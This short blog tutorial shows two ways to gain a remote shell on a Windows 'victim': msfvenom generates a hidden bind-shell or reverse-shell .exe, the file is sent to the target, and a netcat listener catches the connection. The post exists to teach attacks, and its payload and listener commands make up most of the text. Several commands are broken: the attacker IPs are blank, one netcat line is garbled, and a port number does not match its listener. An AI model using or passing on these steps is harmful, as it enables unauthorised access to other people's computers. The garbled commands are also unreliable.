2 ways to use Msfvenom Payload with Netcat

In this article you will learn how we can connect with victim through netcat shell using msfvenom payload. There will be two different ways for hacking any system using msfvenom with netcat.

1st Method

Firstly open the terminal and type following command for msfvenom which generate an exe payload:

Msfvenom –p windows/shell_hidden_bind_tcp ahost= lport=8956 –f exe > /root/Desktop/root.exe

Then send this root.exe file to victim and open other terminal for netcat shell and type following command:

nc 89565

When victim will click on root.exe file attacker will get access of victim’s system.

2nd Method

Again open the terminal type following command for msfvenom which generate an exe payload:

Msfvenom –p windows/shell_reverse_tcp  lhost= lport=888 –f exe > /root/Desktop/1.exe

Then send this 1.exe file to victim and open other terminal for netcat shell and type following command:

nc -lvp 8888

When victim will click on 1.exe file attacker will get reverse connection of victim’s system.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

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2 ways to use Msfvenom Payload with Netcat 2 ways to use Msfvenom Payload with Netcat Reviewed by Anonymous on 6:48 AM Rating: 5